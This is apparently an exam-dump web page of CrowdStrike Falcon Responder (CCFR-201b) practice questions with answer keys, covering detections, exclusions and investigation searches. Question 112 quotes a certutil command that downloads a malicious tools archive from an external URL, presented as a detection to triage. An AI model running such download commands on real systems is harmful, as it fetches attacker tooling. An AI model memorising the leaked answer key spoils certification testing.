
Online Questions - Valid Practice To your CCFR-201b Exam (Updated 212 Questions)
Practice To CCFR-201b - Remarkable Practice On your CrowdStrike Certified Falcon Responder Exam
NEW QUESTION # 107
The function of Machine Learning Exclusions is to___________.
- A. stop all detections for a specific pattern ID
- B. Stop all Machine Learning Preventions but a detection will still be generated and files will still be uploaded to the CrowdStrike Cloud
- C. stop all sensor data collection for the matching path(s)
- D. stop all ML-based detections and preventions for the matching path(s) and/or stop files from being uploaded to the CrowdStrike Cloud
Answer: D
NEW QUESTION # 108
To ensure that a malicious file cannot be accidentally executed or accessed by other processes, how are quarantined files stored on the local endpoints?
- A. They are renamed with a random 32-character extension.
- B. They are moved to a password-protected ZIP file on the desktop.
- C. They are hidden within the Windows System32 directory.
- D. They are stored in an encrypted format.
Answer: D
NEW QUESTION # 109
From a detection, what is the fastest way to see children and sibling process information?
- A. Select the Process Timeline feature, enter the AID. Target Process ID, and Parent Process ID
- B. Select Full Detection Details from the detection
- C. Right-click the process and select "Follow Process Chain"
- D. Select the Event Search option. Then from the Event Actions, select Show Associated Event Data (From TargetProcessld_decimal)
Answer: B
NEW QUESTION # 110
When looking at the details of a detection, there are two fields called Global Prevalence and Local Prevalence. Which answer best defines Local Prevalence?
- A. Local Prevalence tells you how common the hash of the triggering file is within your environment (CID)
- B. Local prevalence is the frequency with which the hash of the triggering file is seen across the entire Internet
- C. Local prevalence is the frequency with which the hash of the triggering file is seen across all CrowdStrike customer environments
- D. Local Prevalence is the Virus Total score for the hash of the triggering file
Answer: A
NEW QUESTION # 111
Which of the following tactic and technique combinations is sourced from MITREATT AND CKinformation?
- A. Malware via PUP
- B. Credential Access via OS Credential Dumping
- C. Machine Learning via Cloud-Based ML
- D. Falcon Intel via Intelligence Indicator - Domain
Answer: B
NEW QUESTION # 112
You receive a detection on certutil.exe executing the following command line:
certutil -urlcache -split -f " hxxps[:]//github[.] com/Endizz/Payloads/raw/main/MyMaliciousTools.zip " " MyMaliciousTools.zip " What is the appropriate next step to discover how this occurred?
- A. Investigate host event logs pertaining to logon-type events
- B. Investigate the host's firewall settings
- C. Investigate the host by using on-demand scans
- D. Investigate the process tree and determine what executed certutil.exe
Answer: D
Explanation:
The command line shows certutil being used to retrieve an archive from an external URL. Although this is suspicious, the immediate investigative question is how certutil was launched. The detection's process tree supplies that context by showing parent-child relationships, command lines, users, and related activity.
Identifying the parent process can reveal whether execution originated from a browser, Office application, script interpreter, scheduled task, service, or interactive shell. Logon events and firewall settings may become relevant later, but they do not directly establish the execution chain. An on-demand scan may find malicious files, yet it will not explain the initiating process. Reviewing the process tree first is therefore the most direct way to determine what executed certutil and how the behavior began.
NEW QUESTION # 113
In the 'Graph View' of a detection, processes are connected by arrows. Which of the following does a yellow arrow connecting two processes indicate?
- A. A file was written by the first process and read by the second.
- B. A Thread Injector-Injectee relationship (Process Injection).
- C. A standard Parent-Child relationship.
- D. A Network connection was established between the two processes.
Answer: B
NEW QUESTION # 114
In the full detection tree view, icons provide visual cues about the telemetry. What does the specific icon representing a 'Falcon' (blue bird) indicate to the responder?
- A. The file has been successfully quarantined by the sensor.
- B. The host is currently undergoing a remote live response session.
- C. There is related Intelligence (Intel) data available for this detection.
- D. The process has been identified as a legitimate system file.
Answer: C
NEW QUESTION # 115
Host Search is a powerful investigation tool. From which of the following sources is a responder most likely to pivot directly to a Host Search?
- A. A specific detection that occurred on a particular host.
- B. A global intelligence report about a new adversary.
- C. The main settings menu of the Falcon console.
- D. The help documentation in the Support portal.
Answer: A
NEW QUESTION # 116
The Falcon sensor is designed to provide deep visibility into endpoint activity, yet it is not omniscient.
According to the Cyber Kill Chain model, which of the following stages does the Falcon sensor typically NOT have visibility over?
- A. Delivery of a malicious document via an encrypted email attachment
- B. Installation of a persistent backdoor
- C. Exploitation of a memory-resident vulnerability
- D. Weaponization of a malicious payload on the adversary's infrastructure
Answer: D
NEW QUESTION # 117
Which tool or search type is recommended as the "best search" to use when performing the "Examine what's normal for this system" step in an investigation?
- A. Host Search
- B. User Search
- C. Hash Search
- D. IP Search
Answer: A
NEW QUESTION # 118
You found a list of SHA256 hashes in an intelligence report and search for them using the Hash Execution Search. What can be determined from the results?
- A. Identifies detections related to the specified hashes
- B. Identifies a detailed list of all process executions for the specified hashes
- C. Identifies users associated with the specified hashes
- D. Identifies hosts that loaded or executed the specified hashes
Answer: D
NEW QUESTION # 119
From the Detections page, how can you view 'in-progress' detections assigned to Falcon Analyst Alex?
- A. Filter on 'Hostname: Alex' and 'Status: In-Progress'
- B. Filter on 'Status: In-Progress' and 'Assigned-to: Alex*
- C. Filter on'Analyst: Alex'
- D. Alex does not have the correct role permissions as a Falcon Analyst to be assigned detections
Answer: B
NEW QUESTION # 120
What action is needed to ensure Falcon does not block or generate a detection for a process by using the file hash?
- A. Create an IOA Exclusion with an action of allow for the hash
- B. Create a Machine Learning Exclusion with an action of allow for the hash
- C. Create a Custom IOC with an action of allow for the hash
- D. Create a Custom IOA with an action of allow for the hash
Answer: C
NEW QUESTION # 121
How long does detection data remain in the CrowdStrike Cloud before purging begins?
- A. 45 Days
- B. 90 Days
- C. 14 Days
- D. 30 Days
Answer: B
NEW QUESTION # 122
When examining a detection process tree, several fields are provided to give context. Which of the following is NOT included in the standard fields of a detection process tree?
- A. HTTP Post contents
- B. SHA256 Hash
- C. Command Line
- D. User Name
Answer: A
NEW QUESTION # 123
When you configure and apply an IOA exclusion, what impact does it have on the host and what you see in the console?
- A. The associated detection will be suppressed and the associated process would have been allowed to run
- B. The process specified is not sent to the Falcon Sandbox for analysis
- C. The associated IOA will still generate a detection but the associated process would have been allowed to run
- D. The sensor will stop sending events from the process specified in the regex pattern
Answer: A
NEW QUESTION # 124
What happens when you create a Sensor Visibility Exclusion for a trusted file path?
- A. It disables detection generation from that path, however the sensor can still perform prevention actions
- B. It excludes sensor monitoring and event collection for the trusted file path
- C. It excludes host information from Detections and Incidents generated within that file path location
- D. It prevents file uploads to the CrowdStrike cloud from that file path
Answer: B
NEW QUESTION # 125
When analyzing an executable with a global prevalence of common; but you do not know what the executable is. what is the best course of action?
- A. From detection, use API manager to create a custom blocklist
- B. Do nothing, as this file is common and well known
- C. From detection, submit to FalconX for deep dive analysis
- D. From detection, click the VT Hash button to pivot to VirusTotal to investigate further
Answer: D
NEW QUESTION # 126
......
True CCFR-201b Exam Extraordinary Practice For the Exam: https://learningtree.actualvce.com/CrowdStrike/CCFR-201b-valid-vce-dumps.html